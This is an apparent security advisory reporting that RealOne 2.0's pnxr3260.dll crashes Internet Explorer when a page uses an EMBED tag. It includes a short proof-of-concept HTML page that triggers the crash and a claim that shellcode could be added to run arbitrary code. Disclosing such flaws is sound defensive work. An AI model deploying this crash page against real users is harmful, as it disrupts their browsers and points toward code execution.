Realone2.0 "pnxr3260.dll" Lets Remote Users IE Browser Crash
Impact: Denial of service via network
Version(s):Realone 2.0(build 6.0.11.868)
I. BACKGROUND
<EMBED ...> puts a browser plugin in the page. A plugin is a special
program located on the client computer (i.e. not on your web server) that
handles its own special type of data file. The most common plugins are for
sounds and movies. The <EMBED ...> tag gives the location of a data file
that the plugin should handle.
II. DESCRIPTION
A vulnerability was found in the IE browser with system installed Realone
2.0(build 6.0.11.868) in the processing of the 'embed' tag. A remote user can
create HTML that include <EMBED ...> , when loaded by the client user, will
cause the client user's browser to call the plugin of Realone,and then the IE
browser crash.
The err signature of Iexplorer.exe:
AppName: iexplore.exe AppVer: 6.0.2800.1106 ModName:pnxr3260.dll
ModVer: 6.0.7.4552 Offset: 00003e98
III. ANALYSIS
An attacker can exploit the above-described vulnerability to execute
arbitrary code under the permissions of the target user. Successful
exploitation requires that the attacker convince the end user to install
realone2.0(build 6.0.11.868.
Premise:the client user had installed realone2.0(Edition 6.0.11.868).
The following demonstration exploit can cause IE to crash:
<html>
<head>
<script language=javascript>
function dSend() {
document.crash.text;
}
</script>
</head>
<body onLoad="dSend()">
</head>
<P><EMBED src=http://w.net/mp3/wind.mp3 ></P>
</body>
</html>
The attacker can insert shellcode script in above html to execute
arbitrary code.
IV. Solution
Updated to the newest edition of reaone.